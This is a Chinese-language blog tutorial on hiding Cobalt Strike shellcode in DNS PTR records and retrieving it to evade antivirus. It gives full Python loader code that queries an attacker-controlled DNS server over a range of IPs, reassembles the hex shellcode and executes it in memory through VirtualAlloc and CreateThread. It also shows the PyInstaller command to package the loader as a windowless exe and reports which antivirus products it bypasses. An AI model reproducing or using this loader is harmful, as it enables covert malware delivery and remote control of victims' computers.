DNS解析中的PTR记录负责反向解析,即把IP地址解析为域名。利用PTR记录保存shellcode,然后通过dns请求获取到shellcode后执行,来达到免杀的目的。
PTR记录的两个特性
1.不区分大小写,dns解析结果统一转为小写
2.格式不定,可以出现包括“!@#$%^&*()_+=/?<>”在内的各种特殊字符和空格,只有反斜杠“\”会被过滤。
在本地服务器添加
进行反向解析查询,192.168.111.135为DNS服务器的ip
1 nslookup -qt=ptr 192.168.111.1 192.168.111.135
可以看到成功获取了之前设置好的内容,可以把这一段代码替换成shellcode
用cs生成shellcode,由于shellcode本质是一串十六进制的机器码,因此可以先去掉前面的转义字符\x并以字符串的形式保存在PTR记录中,执行时再转为十六进制格式,也符合PTR记录中不能出现反斜杠的规则
分割shellcode,每个ip对应的PTR记录保存一行,这里添加的IP为192.168.111.20-192.168.111.59
去掉所有的\x,把它们分割成多个部分按照顺序添加到PTR记录中
只需要按照顺序对相应的ip发起请求即可获得部分shellcode
利用python的dnspython库获取PTR记录中的shellcode,然后分配内存执行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 import dns.resolverimport dns.reversenameimport ctypes dnsip='192.168.111.135' def LoadshellCode (shellcode ): ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0 ), ctypes.c_int(len (shellcode)), ctypes.c_int(0x3000 ),ctypes.c_int(0x40 )) buf = (ctypes.c_char * len (shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len (shellcode))) handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0 ),ctypes.c_int(0 ),ctypes.c_uint64(ptr),ctypes.c_int(0 ),ctypes.c_int(0 ),ctypes.pointer(ctypes.c_int(0 ))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1 ))def requestptr (dnsip,ipnum ): ipaddr='192.168.111.%d' %ipnum ip=dns.reversename.from_address(ipaddr) my_resolver = dns.resolver.Resolver() my_resolver.nameservers = [dnsip] answer = my_resolver.resolve(ip,'PTR' ) recvptr=str (answer[0 ]).strip('.' ) return recvptrdef str2hex (shellcodedemo ): s='' s1=b'' for i in range (int (len (shellcodedemo))): if i % 2 == 0 : s1 += bytes .fromhex(shellcodedemo[i:i + 2 ]) return bytearray (s1)if __name__=='__main__' : s='' for i in range (20 ,60 ): s+=requestptr(dnsip,i) LoadshellCode(str2hex(s))
使用pyinstaller打包成exe文件,
1 pyinstaller -F -w dnsptrshellcode .py
pyinstaller默认一并打包所有库,造成生成的exe文件体积过大,可以利用虚拟环境打包的方式压缩下体积,压缩后的体积大概为3M左右
https://blog.csdn.net/p1967914901/article/details/109706449
拿到beacon
可以绕过360,但被火绒查杀
github地址:https://github.com/sp4zcmd/DnsPTRShellcodeLoader
参考:
https://www.freebuf.com/articles/network/185324.html